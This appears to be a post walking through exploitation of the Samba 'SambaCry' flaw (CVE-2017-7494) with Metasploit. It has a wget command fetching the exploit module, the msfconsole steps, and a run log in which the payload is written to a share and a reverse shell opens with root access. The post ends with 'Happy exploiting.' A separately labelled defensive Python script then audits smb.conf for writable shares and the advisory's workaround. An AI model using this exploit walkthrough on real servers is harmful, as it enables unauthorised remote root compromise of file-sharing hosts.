Samba 3.5.0 – Remote Code Execution (CVE-2017-7494) Metasploit

Hmm, it looks like a remote code execution exploit is hitting Samba file sharing on Linux as well. Will there be a Linux version of WannaCry that takes advantage of this hole? Or should it be named Sambacry?

wget https://raw.githubusercontent.com/hdm/metasploit-framework/0520d7cf76f8e5e654cb60f157772200c1b9e230/modules/exploits/linux/samba/is_known_pipename.rb -O /path/to/metasploit/modules/exploits/linux/samba/sambacry.rb

msfconsole
msf > use exploit/linux/samba/sambacry
msf exploit(sambacry) >

Logs:

[*] Started reverse TCP handler on 192.168.48.1:4444
[*] 192.168.48.151:445 - Using location 192.168.48.151shared for the path
[*] 192.168.48.151:445 - Payload is stored in //192.168.48.151/shared/ as nCiuzQVt.so
[*] 192.168.48.151:445 - Trying location /volume1/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /volume1/shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /volume1/SHARED/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /volume1/Shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /volume2/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /volume2/shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /shared/shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /shared/SHARED/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /shared/Shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/SHARED/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/Shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/usb/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/usb/shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/usb/SHARED/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/usb/Shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /media/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /media/shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /media/SHARED/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /media/Shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/media/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/media/shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/media/SHARED/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /mnt/media/Shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /var/samba/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /var/samba/shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /var/samba/SHARED/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /var/samba/Shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /tmp/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /tmp/shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /tmp/SHARED/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /tmp/Shared/nCiuzQVt.so...
[*] 192.168.48.151:445 - Trying location /home/nCiuzQVt.so...
[*] Command shell session 2 opened (192.168.48.1:4444  -> 192.168.48.1:45072) at 2017-05-24 19:40:33 -0500
id
uid=0(root) gid=0(root) groups=0(root),100(users)

If anything is unclear, feel free to ask. Happy exploiting.
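
The session in the log depends on two things on the server: a share the client can write the `.so` into, and smbd still answering named pipe requests. As an added example (not part of the original post or of the Metasploit module), this Python script audits smb.conf text for writable shares and for the `nt pipe support = no` workaround given in the Samba advisory for CVE-2017-7494. The sample config and the function names are constructed, and it assumes no `include` files or line continuations.

```python
# Added example (not from the original post): audit smb.conf text for the
# configuration the log above depends on. Sample config is constructed.
TRUE = {"yes", "true", "1", "on"}
INVERTED = {"writable", "writeable", "writeok"}  # flipped synonyms of "read only"

def parse_smb_conf(text):
    """Return {section: {param: value}}; parameter names lowercased, spaces removed."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":          # blank line or comment
            continue
        if line.startswith("[") and line.endswith("]"):
            current = sections.setdefault(line[1:-1].strip().lower(), {})
        elif "=" in line and current is not None:
            key, value = (part.strip() for part in line.split("=", 1))
            key = "".join(key.split()).lower()
            if key in INVERTED:                   # store as "read only" so the last setting wins
                key, value = "readonly", "no" if value.lower() in TRUE else "yes"
            current[key] = value
    return sections

def audit(text):
    """Report writable shares and whether the 'nt pipe support = no' workaround is set."""
    conf = parse_smb_conf(text)
    glob = conf.get("global", {})
    pipes_off = glob.get("ntpipesupport", "yes").lower() not in TRUE
    default_ro = glob.get("readonly", "yes")     # Samba shares are read-only by default
    writable = sorted(
        (name, params.get("path", ""))
        for name, params in conf.items()
        if name != "global" and params.get("readonly", default_ro).lower() not in TRUE
    )
    return {"nt_pipe_support_disabled": pipes_off,
            "writable_shares": writable,
            "needs_attention": bool(writable) and not pipes_off}

SAMPLE = """
[global]
   workgroup = WORKGROUP
   ; nt pipe support = no
[shared]
   path = /volume1/shared
   Writeable = Yes
[docs]
   path = /srv/docs
   read only = yes
"""

if __name__ == "__main__":
    print(audit(SAMPLE))
```

The workaround is a stopgap until a patched Samba release is installed, and the advisory notes it can disable some functionality that Windows clients expect.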